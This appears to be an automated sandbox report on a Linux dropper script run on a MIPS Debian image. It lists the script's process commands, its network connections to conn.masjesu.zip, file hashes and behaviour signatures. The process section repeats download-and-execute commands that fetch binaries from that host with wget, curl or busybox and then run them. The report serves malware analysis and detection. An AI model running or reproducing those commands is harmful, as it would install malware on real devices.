[curl -O http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/chmod
[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ
[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/bin/rm
[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/chmod
[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr
[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/bin/rm
[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/chmod
[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs
[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/bin/rm
[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/chmod
[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2
[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/bin/rm
[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/chmod
[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0
[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/bin/rm
[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/chmod
[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ
[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/bin/rm
[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/chmod
[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K
[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/bin/rm
[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/chmod
[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE
[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/bin/rm
[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/chmod
[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce
[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/bin/rm
[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/chmod
[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl
[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/bin/rm
[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/chmod
[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8
[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
/bin/rm
[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-21 01:37
Reported
2024-10-21 01:40
Platform
debian9-mipsel-20240226-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | N/A |
| N/A | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | N/A |
| N/A | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | N/A |
| N/A | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | N/A |
| N/A | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | N/A |
| N/A | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | N/A |
| N/A | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | N/A |
| N/A | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | N/A |
| N/A | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | N/A |
| N/A | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | N/A |
| N/A | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | N/A |
| N/A | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | N/A |
| N/A | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | N/A |
| N/A | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | N/A |
| N/A | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | N/A |
| N/A | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | N/A |
| N/A | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | N/A |
| N/A | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI | /usr/bin/curl | N/A |
Processes
/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh
